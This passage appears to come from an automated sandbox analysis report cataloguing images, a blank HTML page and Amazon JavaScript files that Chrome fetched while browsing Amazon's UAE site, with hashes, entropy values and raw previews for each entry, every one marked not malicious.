                                                                                                                                                                                                        SHA-256:77CF72D5A82E647CAEB66255A93B6D46D26F431A0A935414CDE932635E327216
                                                                                                                                                                                                        SHA-512:01B2CA1F8F817485AFD3837FAC03E862369A464266EE32719201344D769E431A14C905EF22C36A414CC6623CFEE7780BEEC1E5428D88BFA3034DC82F739B8F82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81SRiWX-rcL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........2.."..........4.................................................................[w......v>.;.Oz..G.U.0~.W<.w..R-.6....m\w....Qxc]e.=.|.nf+|...l^..F..........=..z0..6.'. ...i{.#...[:..I.......mj*.+SA.....qL..7..r..|....i..-.........._h..|.U..tf.8X....Sl%..HVq.Zk...b.......;.......I.di-..z....R.O....X|..m.....0.$F..e..I..=|....?.r....G=X*..SS......Aq;^..%Z.....=2.h7......l.v.....{cz_....}...........l^b.PY....vy...;.....y=.9......R...bb......*.'i.E#=J.;<......H6.q.f..._.}...;.....y3U.G%..@......*.U.Q..h....{a.;<..Uk.x......n.H..]J.........nz..' .D..}J...I=.....w.tt.k.Gy>.............t.{GR....5..:.Y&b.h.....o.[...x......y.g.>.b...zj..P...<.....p..M.z..#2...f.^..o.9\...Mf..T..$.e...(.U...b_..].,..HI...2.+.1~.F.Z9..._Fs].4.:.f..9{c^.?......=t.V9JO5._G.yH.{..Pm4.vN&N/....O.c....D...K....r!...6<a:.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                        Entropy (8bit):7.8749628673905505
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T4TYQvqhwtAsCp3YnOabRnjiPc3RlCA2gwfW:aqwconOabRj24aKwfW
                                                                                                                                                                                                        MD5:BB1E10140E4E0360228FAD9146228A1A
                                                                                                                                                                                                        SHA1:941D4CDAB0CACD3172491E0B4688485E6EAE4078
                                                                                                                                                                                                        SHA-256:74633C50900D5A067FC07F6312513D123F511CD23A9BBC10A76DDEC05D566B17
                                                                                                                                                                                                        SHA-512:E4FE249BC8218479D9358D68069AE1D4B8516B38265A49CD08A625FB6510B23B776AAE517C892C4EB143F9D98EC6C823E0B714FC8E54ED8384A4F96B684FB1B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1..."Aq.QRa....#2B...T...$br.....................................................!1a...A..."Q..2BRq.S..............?....(.)J.JR.R....(.)J.JR.R....(.Es-K...M....g.FG.@.......Q.H........e...*J3.L.w...(.pw.M:..q.G...N...|....;#^p...~........4?f...}...#.*..$e......q..^......?%.r...?b...Tk...<........8-...1. .Z..u'.O...F.S..-.R...O.>..\....zg.=.....Q..H.`.]r.;..=....dH.WM.......q..i.-S;.D....Ob...S.>..\....V......N...O.;......F.b<..q.....Z..x)4...k...r...,..4Ob...Qz....w?%.r.[.:}.".D,9V..[.<..~...}.sK....^zi.......Q..j.c4........K..u.....v.0.../.E...5o....B5.'.Y.....^ZF.n.....Z^;.*....*......>0>.6...L..*.t.T.5.e.# ^O....\....;6....Z<o.Nr.K...Z..l...9?.U....~....#...X{6I.^.=h#.......2+b..4...]@.M..|.........|....l].(.QoK..am|
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D5114%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):53473
                                                                                                                                                                                                        Entropy (8bit):7.988700354973617
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:HhQO85Kt23XTmw+XBax3marV+Df+wMjchlvk2:HhQO85k23XTmwIB43m0+z+weWBR
                                                                                                                                                                                                        MD5:0FB6944ACEC4E40518B2ECF15E4CC802
                                                                                                                                                                                                        SHA1:A4388226B837A50770F2DDB5FD35BDA24F5AF6E8
                                                                                                                                                                                                        SHA-256:E00FEC13C48C56548764A28BD68F0AA902B8822B6F49BCA412B1E16F04B44FE0
                                                                                                                                                                                                        SHA-512:C66682A2D505E017C48F578A982727840C94DDCDF568704251E10457A0DEEA3AAA421B7B2E9CEFD1E5A1E95DEADAD06077D4AF1CC72348E96EEE576469A19945
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U..............S.....T..............V".=.....R...........M........O%1@(4C....*9.....Y.t....................h~...................k.....x.....%5.]u......... 0..L.cx....]s.}....#..(....{.....m......M.G^.......[j.8E.c~....Xn..........Pi..p....Un.......ds....Mc.~..LX............DZ............Sa.........Ti.....,....Ld...z....h.....DP....t....t..y.........N_......n......u..........g..@R..i.....".......z..\.......|.....<K....EV..........Na............m...........e.2>..w....~.....Ybm...4..Q....t.=GT..].......d............~.....8H.m.......|.3>K......NXeP..}..kv~..{..a...w.........cmx......'....<...M..FR\....0...v....d...X.+...ds;..|..'....p.)4......B....rs...Q..n..S.I..Z....S.R].....*.......6...m..#s...j.vc.....z....Ey.\l.%.... .IDATx..?h[Y.......<.......1.H.B..t..d ...4...m..Z...2..).m.6(S..k....p........r..{.....20.{-K.=.Y..}.;..5...o.....zkkk.K..2?.J.......&.z.v..kg..K...V..MK.....<M.2a).hi..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 185x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5488
                                                                                                                                                                                                        Entropy (8bit):7.931036658332724
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TSzd1J/OiCQFNR+olXtyMpk14s0g6FeBCzfDRr3NOwlR8Nql:OzdGiHFNRBuV36FeW5Nn2NG
                                                                                                                                                                                                        MD5:4A5CEDCB1CDA46637E58ADDFBAB6A478
                                                                                                                                                                                                        SHA1:666F04B9750D58558C938AF9AB2D8B8DBD98FBE0
                                                                                                                                                                                                        SHA-256:0FB7B8F117CA9360CCD5B42E07F3888B7A2BC07D0917DA689548AA2C002CBF39
                                                                                                                                                                                                        SHA-512:740A0CE692056C2184405A865AF63387646CE9FD10E4301720AA02A453FB4EA3F7E6CF82ED5BD7C4B3BE6B9E022F728353F17C5CAA1F42B76B4D8419D52B6D2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQaqrs...46t.."235B..........#$CDRbu..%ES...T...................................................!QR..12A..."r..B............?..Z.(........GN.{......{.#A($.w5.|/)......}.|.......>....7....b......?.T....S.:OK.yKF.d...|..m.W.&....6.....s.{.ih......#.*....b....k0jV.g....N.`.b..~......P.N..s?h..<N..[.......J>.2.....8h..Y..>e...3.d.m9f.x...T.B>..*..ZF....G.U..z..hp..F_!._...8.O}.,[....G.C.H.t.c...././.>...!..QHC...>.=../=.L...6.....~..)...........g4O)..mw..-..4..&..b.a2a..3.=E[YR..Z@.J.y."p:.|..N.k.....>....d.V.w.N7.......m.^I.1].OV.EX#.A.n.9...bp...,...H{.....u.k..X..)L6J.2.>.5G?..p.V.3....N.V....7.vt.u..'PA..U.su,~........2....w.#.;M..~...:,..+.*..d...S.\.s.wI.).....I....B.V....|Z.9O.x.....X0.Q......u...#_.:....U-T....2...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2132
                                                                                                                                                                                                        Entropy (8bit):7.754854253062559
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rVLPMNn4fEYWfsmojwRTt04o5LW4PA+YmDNv55/uybbsA8:TEfqfwst04o444+YmDBK
                                                                                                                                                                                                        MD5:42E5B8A2E632B2CD6F4EF7B2163CAB99
                                                                                                                                                                                                        SHA1:95984EC0C369FD16EE0A6120AB8D1551060ADFEC
                                                                                                                                                                                                        SHA-256:D027D4A2602C1A135247F7864B96CC2FA6FC743AEEAD6119E6B85B7B46AFC93C
                                                                                                                                                                                                        SHA-512:8D8B1FC4682151497CD7AA02047D92B20DCB3370FA1B814F37C6AAD99B0024A82C5390B17912BCF527A575F0AF42D9A3B74734E53A0073645E13FF5A6279A4D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1A..Qa."...#2q....$Rbt...............................................!1.A.."2............?...D@...DD.J*....L.u..1.o...W.X=Q./.(.......2..W?..E.h..+.*c...,N<....:u?f..fN.K..^...E.rpB" ...""...." .B.(.oW_[b.U...n...p...m._....L...VW.z....|..V...f.K%F@.H&'K..v#..f...r.b...ed1......#].6X...$.s.lE..<.O....8`$....2....K.5U......X..[..$5N.i.:..e..7+q.....=.U.k..B.=.q.dpc.9.-.<.+`....d.R.tp...DD....D@.......5....0\.e.%.E..Q].......J.|.l...w/....B_...}4.5.-......<<.Q..u.....#h.2Z...*.(ie....q'..B..eg..g~.~......_.M...c../..4r.ER..rT.I.G0?6.x..o...s.[.$.o.o..v...<LY..h../.u.tT.A..c.>..{>u...DE..DD....D@...!HE.U.i...$.m..9#...]..7..1....$.l1R<..%.{.a.mp......s.z.M]......Be{....0:.....zK{....,.....X.K..*|I.{,...c..>_8....5..4..)%....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3611
                                                                                                                                                                                                        Entropy (8bit):7.628960741560591
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0TFYIN38APcxRdeW9z8muOOHKC8yAa2weqyrxz+as13SYIo9EEG7YWSe11vMr:TU64MAGeW9NgHKC8a2oydz+BG7YWzPY
                                                                                                                                                                                                        MD5:DC3AAE587246089D0E7A37E5C3B1A9D3
                                                                                                                                                                                                        SHA1:9E3E4E4E22E09C267F1B5EF8F49DEE7E20C3644B
                                                                                                                                                                                                        SHA-256:43301A19A32DC7D0352396AD64FEB597377D3202B3A2975DA0942C09BE96F65C
                                                                                                                                                                                                        SHA-512:9053700FA899B3208B673A43783A4AB3ED86116A08163491560F2BAF028D34D0F33A558505A25427847ECE78213140EDF526AF5BE677908AC3E5D6A0C0FBB533
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31OXYlKv9gL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................`....c..................x".xw.~^................}~...m|..P..........m/.5.............X.?.Ch............c*............q.....Z.................Sm.............[......?............./...2..h&......,..E...NX........./.s..T..7.^h........(y.*$..w.$..n.......".Z.h......7.u.N*{*+...n....H.u..gS_8-V. ....W......)......................................................@..!"012#AB.. $PR`.................3M.;].E..w......}....B.G.....w.\...).....v=.....Y@e.{...Yr@.{.(F..O...h.WX...:.+,\......ccX......K3..V....l.mvyzr.[.C.$+.;Q.[....]Y/.*.....z.4.Xg....:..N.u..n....^...n..-ea'......,*...V.....|..n...Z....W.-.:_.T,.5D>....V~.O.3...5...=|......k..%.....P.37M.O#...3..6k.)b......^7.....kTI.eq..9..?....1|.....u)..,t.m.-S.g....w.<..\..U...z
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):317121
                                                                                                                                                                                                        Entropy (8bit):5.382549810640479
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:xYcQZMuZ7q9P1+pKbaMKNwCe3DNEz7+OeQm81AWWwIty8cIQygwYvsjfq08:xYXUMKbaMKaC3m81bVItyb5wYUrq08
                                                                                                                                                                                                        MD5:EDA8128C6BF3EBC56B6C8687CD5C8C74
                                                                                                                                                                                                        SHA1:6AC6DDF899CFDCCF21D5D473FF96029EFEA4D2B5
                                                                                                                                                                                                        SHA-256:F096709892C962D8E2C2E5A886DA566F5FF23095E0BA1D49CEFCD5F80B6459B5
                                                                                                                                                                                                        SHA-512:4635AB9CDE70878F17B6A2975154233FF99B44FC965B01805CCD3E6DA888F3B47FFA9E1FD5BF6D0C644C95317FB62CD93F47C4BFCCC153ADDDAFEBEFFB54B9A7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 343x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19261
                                                                                                                                                                                                        Entropy (8bit):7.968085191012163
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:+kNa3ACiDzp98IVHlkwsT2dDA0xHsWf1o8tQo1J1A+MEJjcjI362Ji6S42Rh:+0j/DzpHVFFsT2dDALWf1oepAeJjB3cH
                                                                                                                                                                                                        MD5:58C5BCB897EBF4300C90E59AE42406C7
                                                                                                                                                                                                        SHA1:0CABF58C566B48DCC284F3121C9F7C662A7BEB69
                                                                                                                                                                                                        SHA-256:A8E63FFA12DFB54CC69AD68B5E7EF1641A1D8CE74F63D219AC8D3F3E7AAAA6C6
                                                                                                                                                                                                        SHA-512:ACDC40531601693C112F670D32CA01BB22BD4435C84B072A84AC120C61A3FF8ADF7A270E930D16979B633B0697B7D2D6A0028CAB167196F985B89E64D4735734
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........W.."..........5.................................................................R/..l&.0&.0&.<..j..j..j..k......@.R..Pw.K.`M.`M.y.`..`..`..`...Z}|~.a].....6z.."..6I!$...H.HI!$.'0.M..)w..>..&UpX .(k$..NxI$$..rq9....9.{@..Z..8.{<..%..I!$.3.s8.B..mje.+..>wZ3.......>y..!Q..f3.O.......j ..Y..F!.3.s...0.YO>..@.:..$.0..8.E...4..je..P.....Y.:..k.w.R..&.......a25.....b...,..|3...YA..~m.+...`n.t.%.O-.KQ..k.....j.._.&.....u.U....3L...r{...b.\....~.f=PY...j.zgb.D:*G8A...U3..E-.X...p..=|.<...['...q{..U.yu._n&..o:w........*.|.d..~..m..;...'.PM...Y8;....kd ~...HwX;.i.....$T.........1..$TK....9.........".=....g.fUk..;...V..lb....*.........(/^.<.\...,.[e.[...<.f.]6%8.Tc..k5.`....0....d...9.....R..w.....T[o.{!.S)....]F.U..sn..e7...x.fT-.>.(..ZvKx.M:..6m..Qy...G.D.v.S..u..../.+-...k.[i7.V....h....<+v.X.wB@....gT
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13218
                                                                                                                                                                                                        Entropy (8bit):7.864034228159954
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:E++Fig5KfN74L1XzqzZgJXZiWGqG2KxKne1YxBU7YlpWnFGes8T8squWESbljEi2:7+04xXVX8YrBUMbUFGes8osquaowQ5EY
                                                                                                                                                                                                        MD5:EFFFF114D0586635AFBBA9DF43E7CB5B
                                                                                                                                                                                                        SHA1:77B21281CCA6A50FB939E2D58D82A626A88E4CBA
                                                                                                                                                                                                        SHA-256:CA262FCFBCE803D40BBA897B0DB44BA02454A6ADE29CB98279BDC5D1EF77558F
                                                                                                                                                                                                        SHA-512:D3B4EE80987D0B8311652F7C9E3068157E351EFAC356FF3B2B0485C905296E07AE04D8327468CF95885D2278BCA9EBE6161D0E6A9C2B3DB0BAD29EA9B2269C8A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/MV5yNztdnPUc5FB.png
                                                                                                                                                                                                        Preview:.PNG........IHDR..............$....8PLTEGpL.y!.y!.y!.z".y!..%.:.o<..z".{#....^.J....z .......y!....z!.y!.....z"......ossnrrQegJNNAKLIMM[^_JNNIMM....tP.........OSS..........GLMJNNBFFJNNJNNINN...JOP...JNN...~.....JNNIMM...IMM...................x..~.pss.q...........y!.{".z!...z".........z"..&......G..C...y!.y"..8.z!.y..:..9..9..._.L6.....}b.......htRNS.?.. .....o..........`...Q....>. ..............Kt............^..................w...H.f.................s....1.IDATx...E..0.CQS.a...s.Q.....hW...i.....B....5....;`...6......w.{.....:......x......5.x...J.R.f!..)...i.<.\$-..M.)...i.<T".8....5.x.4.NDB..u..#...6.B+V;+%.._......D.Ke....o.{E.1.<.M.G......4.......u..p...4'..p.....416$8q...)...B...B..C .R.K.~...G.=H..._.3......AS..o..8Bi....KW.s...Ei).~f...I..I.g......w.z.......i.k..,......h,......>.2.~....}iT..}*)..-......Os..S&..P{i..(8.Z....$.8....YJ...+.K/5......."...}:P...P{....g...4#.|.3v`..SHruI.PA..C~~.6..).Z].S*(..pDw.....q........D..ZY...,....\..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2435
                                                                                                                                                                                                        Entropy (8bit):7.758972943518561
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6lrE9CZTBH4kXXsFd0aBzPacvj/pGUnD+OVbK:TsCfBHizS8j3nHbK
                                                                                                                                                                                                        MD5:0F23329CFBCCCEF7F1F761A4DD101445
                                                                                                                                                                                                        SHA1:885A686AAF453B4994410DCFE4074402F0EE89C5
                                                                                                                                                                                                        SHA-256:45C12CC0FD3E40394DE45770221E50489F32B8B8145F5587C643FC9F8E8612B7
                                                                                                                                                                                                        SHA-512:441EA68739A45C35EBAD77FFD20915289ECBDF1E9627B8E5B0C3E0D161EC7073DCC5354CDEC13851EA5047762CC049181AEF2BD6EE0A364521ED860B4F1DF4F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!..1AQ."aq.....#Rr.2b...$C..B................................................1!"A.Q............?..." ...""....%u..u1@....9.....1.....A.6..L..#...B.z7./.V........&.D.""...." ...""...." ... D@2...V8.$....wM..d...=.w.....4.Y.:.........w..M%..n.+~f...c.BN...@5.|..?.F._.."^Q.[.s...S[.?3.../. ....4..A..).>...h5-.X. ...V.,..<K.&.S.M~.?.....}\..J....>lK... ....d....H.~....3........L..C.W...O.\...3G%KV..DD..D@...DD....D@."1...V.+.......E...xe..#l.E.S....O...nV......_...j.......q..I....=I^{.......\~B....ip.b.uj..|G.*~D.$-Q....s^.%....Ku...U*.2!.ONzr..{.....WG........u.s...{...b...|D...~.EF.O..M.;...\..*NS...q-...{4...w'5..+...xA.q...c?.(K$.c.sZ....fF.D.o[.;@j.p.....i...+..N.{.3*.i........kS_..#.(7..j6k....FAL.........<F0fs.Y..1i.....R.v..m.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (554)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22238
                                                                                                                                                                                                        Entropy (8bit):5.462732761322017
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:N3vs3ZqxUtys0fT1vc/H07ki75gSCdYiIECXkX:hiZq00fTa/LiNo60CXG
                                                                                                                                                                                                        MD5:1E28B6A098229945277CAB050100ED00
                                                                                                                                                                                                        SHA1:CE315BB331939790038D472D05FE0C62520B16CD
                                                                                                                                                                                                        SHA-256:351340F0311ED626FF7B5A447AF0BB5AE1614178B560295D8646E49A0747E692
                                                                                                                                                                                                        SHA-512:324BF31134BE40273ADD8F528B44DDC6A067C351EA192DB4A9832C2F21B933012AAB6B92A13B19BD8833142ED587585F057AD4EFB86C01FEE7C398A76771A928
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(f){var m=window.AmazonUIPageJS||window.P,r=m._namespace||m.attributeErrors,q=r?r("AuthXClaimCollectionUIAssets",""):m;q.guardFatal?q.guardFatal(f)(q,window):q.execute(function(){f(q,window)})})(function(f,m,r){f.when("A","jQuery","a-button","a-spinner","authx-claim-collection-alerts","authx-claim-collection-input","authx-claim-collection-csm","authx-claim-collection-csrf-token","authx-claim-collection-beacon","authx-claim-collection-validation","authx-password-encryption","ready").register("authx-claim-collection-controller",.function(e,b,d,a,g,k,c,h,l,t,L){function f(){var a=b("#claim-submit-button");return a.length?a:b("#continue")}function v(a){var b;m.location.search.replace("?","").split("\x26").reduce(function(c,d){c=d.split("\x3d");c[0]===a&&(b=c[1])},{});return typeof b?encodeURIComponent(b):""}function p(b){e.trigger("in-context-auth-error-event",b)}function N(a){I();if(a){if(a.model){if(a.model.error){c.logCount(c.metrics.FORM_SUBMIT_INVALID_CLAIM);try{k.type()===k.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2354
